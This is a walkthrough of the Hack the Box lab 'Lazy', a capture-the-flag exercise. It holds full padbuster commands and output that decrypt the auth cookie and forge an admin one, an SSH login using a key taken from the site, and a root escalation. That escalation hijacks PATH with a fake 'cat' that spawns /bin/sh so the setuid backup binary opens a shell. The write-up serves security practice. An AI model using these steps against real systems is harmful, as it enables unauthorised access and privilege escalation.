HTB – Lazy

Today we are going to solve a CTF Challenge “Lazy”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. They have labs which are designed for beginners to the Expert penetration testers. Lazy is a Retired Lab.

Level: Medium

Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!

As these labs are only available online, therefore, they have a static IP. Lazy Lab has IP: 10.10.10.18.

Now, as always let’s begin our hacking with the port enumeration.

c:\Users\jacco>nmap -sC -sV 10.10.10.18
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-09 19:43 W. Europe Standard Time
Nmap scan report for 10.10.10.18
Host is up (0.028s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 e1:92:1b:48:f8:9b:63:96:d4:e5:7a:40:5f:a4:c8:33 (DSA)
| 2048 af:a0:0f:26:cd:1a:b5:1f:a7:ec:40:94:ef:3c:81:5f (RSA)
| 256 11:a3:2f:25:73:67:af:70:18:56:fe:a2:e3:54:81:e8 (ECDSA)
|_ 256 96:81:9c:f4:b7:bc:1a:73:05:ea:ba:41:35:a4:66:b7 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: CompanyDev
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.15 seconds

The Port 80 is open so let’s open IP in our browser to see that if a website is hosted on the IP. After opening the IP in the browser, we were greeted by a simple page with Register and Login Links. Clicking on the Register opens up a form.

Then I decided to register as admin: 123 for username and password respectively.

But I got an alert “Duplicate entry ‘admin’ for key PRIMARY”, also received error “can’t create the user: user exists” when I registered as admin. Hence username “admin” is already registered

At last, I decided to use the burp suite for capturing browser request. Here I simply register with puck as username and password iestyle

And got intercepted request, here I saw auth cookie. Then I send the intercept request to the repeater for analyses its response. It gave a hint “invalid padding” which means there could be padding oracle vulnerability. To know more about what is padding oracle vulnerability read our previous article from here. Since I had already faced such a situation in my past experience, therefore, I know what to do next.

Next, open the terminal to run the command shown in the given image which contains target URL and above-copied auth cookie Last part of screenshot has captured three decrypt values in base64, HEX, and ASCII. The cookie of auth is a combination of username with its password from padbuster we came to know what is the encrypted value of username for admin. We are very near to our goal just encrypt this auth cookie with the user as admin once again. Here we have our plaintext as admin and let’s encode it using padbuster.

root@kali:~/htb/lazy# padbuster http://10.10.10.18 gtS9RNEjsR5q8y2qUe%2Br7xplcH4mHld8 8 -cookies auth=gtS9RNEjsR5q8y2qUe%2Br7xplcH4mHld8 -encoding 0

+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 978

INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 200 1133 N/A
2 ** 255 200 15 N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (132/256) [Byte 8]
[+] Success: (58/256) [Byte 7]
[+] Success: (176/256) [Byte 6]
[+] Success: (24/256) [Byte 5]
[+] Success: (205/256) [Byte 4]
[+] Success: (34/256) [Byte 3]
[+] Success: (96/256) [Byte 2]
[+] Success: (1/256) [Byte 1]

Block 1 Results:
[+] Cipher Text (HEX): 6af32daa51efabef
[+] Intermediate Bytes (HEX): f7a7d836ec53c47d
[+] Plain Text: user=puc

Use of uninitialized value $plainTextBytes in concatenation (.) or string at /usr/bin/padbuster line 361, <STDIN> line 1.
*** Starting Block 2 of 2 ***

[+] Success: (23/256) [Byte 8]
[+] Success: (82/256) [Byte 7]
[+] Success: (21/256) [Byte 6]
[+] Success: (174/256) [Byte 5]
[+] Success: (88/256) [Byte 4]
[+] Success: (212/256) [Byte 3]
[+] Success: (13/256) [Byte 2]
[+] Success: (247/256) [Byte 1]

Block 2 Results:
[+] Cipher Text (HEX): 1a65707e261e577c
[+] Intermediate Bytes (HEX): 01f42aad56e8ace8
[+] Plain Text: k

-------------------------------------------------------
** Finished ***

[+] Decrypted value (ASCII): user=puck

[+] Decrypted value (HEX): 757365723D7075636B07070707070707

[+] Decrypted value (Base64): dXNlcj1wdWNrBwcHBwcHBw==

-------------------------------------------------------

root@kali:~/htb/lazy# padbuster http://10.10.10.18 gtS9RNEjsR5q8y2qUe%2Br7xplcH4mHld8 8 -cookies auth=gtS9RNEjsR5q8y2qUe%2Br7xplcH4mHld8 -encoding 0 -plaintext user=admin

+-------------------------------------------+
| PadBuster - v0.3.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 978

INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 2

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 200 1133 N/A
2 ** 255 200 15 N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (196/256) [Byte 8]
[+] Success: (148/256) [Byte 7]
[+] Success: (92/256) [Byte 6]
[+] Success: (41/256) [Byte 5]
[+] Success: (218/256) [Byte 4]
[+] Success: (136/256) [Byte 3]
[+] Success: (150/256) [Byte 2]
[+] Success: (190/256) [Byte 1]

Block 2 Results:
[+] New Cipher Text (HEX): 23037825d5a1683b
[+] Intermediate Bytes (HEX): 4a6d7e23d3a76e3d

[+] Success: (1/256) [Byte 8]
[+] Success: (36/256) [Byte 7]
[+] Success: (180/256) [Byte 6]
[+] Success: (17/256) [Byte 5]
[+] Success: (146/256) [Byte 4]
[+] Success: (50/256) [Byte 3]
[+] Success: (132/256) [Byte 2]
[+] Success: (135/256) [Byte 1]

Block 1 Results:
[+] New Cipher Text (HEX): 0408ad19d62eba93
[+] Intermediate Bytes (HEX): 717bc86beb4fdefe

-------------------------------------------------------
** Finished ***

[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
-------------------------------------------------------

root@kali:~/htb/lazy#

Now replace the original auth cookie from the encrypted value which you have copied above and forwarded the intercepted request.

When request sent by burp suite, automatically on the web server you will get logged in as an admin account. After that when you will access the admin page you will get a URL “my key” that offers us with a username mitsos and an ssh key.

So as you can observe that we had opened the ssh key let’s save it into a text file as “key” on the desktop and if you notice the URL can read ssh login username mitsos.

First, let’s download the key and then give appropriate permission. Now that we have the ssh username and key let’s get an ssh session.

PS C:\PENTEST\htb\LAZY> ssh -i key mitsos@10.10.10.18
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Sat Mar 9 20:39:46 EET 2019

System load: 0.0 Processes: 174
Usage of /: 7.7% of 18.58GB Users logged in: 0
Memory usage: 11% IP address for eth0: 10.10.10.18
Swap usage: 0%

Graph this data and manage this system at:
https://landscape.canonical.com/

Last login: Sat Mar 9 20:39:47 2019 from 10.10.14.20
mitsos@LazyClown:~$ ls
backup peda user.txt
mitsos@LazyClown:~$ cat user.txt
d55*****3fc

As we saw  above that we have the peda and backup folder too. On running the executable backup we saw that it prints the shadow file with user hashes. So we ran the strings command and found that it does contain command “cat /etc/shadow

mitsos@LazyClown:~$ strings backup
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
cat /etc/shadow
;*2$"
GCC: (Ubuntu 4.8.4-2ubuntu1~14.04.3) 4.8.4
.symtab
.strtab

Now, all we need to do was to create a personalized executable cat file, which can be done as shown in the below image. Here we are reprogramming cat to give us the shell, on execution.

mitsos@LazyClown:~$ ls -la
total 64
drwxr-xr-x 5 mitsos mitsos 4096 May 3 2017 .
drwxr-xr-x 3 root root 4096 May 2 2017 ..
-rwsrwsr-x 1 root root 7303 May 3 2017 backup
-rw------- 1 mitsos mitsos 224 May 3 2017 .bash_history
-rw-r--r-- 1 root root 1 May 3 2017 .bash.history
-rw-r--r-- 1 mitsos mitsos 220 May 2 2017 .bash_logout
-rw-r--r-- 1 mitsos mitsos 3637 May 2 2017 .bashrc
drwx------ 2 mitsos mitsos 4096 May 2 2017 .cache
-rw------- 1 mitsos mitsos 2524 May 2 2017 .gdb_history
-rw-rw-r-- 1 mitsos mitsos 22 May 2 2017 .gdbinit
-rw------- 1 root root 46 May 2 2017 .nano_history
drwxrwxr-x 4 mitsos mitsos 4096 May 2 2017 peda
-rw-r--r-- 1 mitsos mitsos 675 May 2 2017 .profile
drwxrwxr-x 2 mitsos mitsos 4096 May 2 2017 .ssh
-r--r--r-- 1 mitsos mitsos 33 Jan 18 2018 user.txt
mitsos@LazyClown:~$ export PATH=.:$PATH
mitsos@LazyClown:~$ echo "/bin/sh" > cat
mitsos@LazyClown:~$ chmod 777 cat
mitsos@LazyClown:~$ ./backup
# whoami
root
# cd /
# ls
root.txt
# less root.txt
990*****515

Author: Jacco Straathof

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *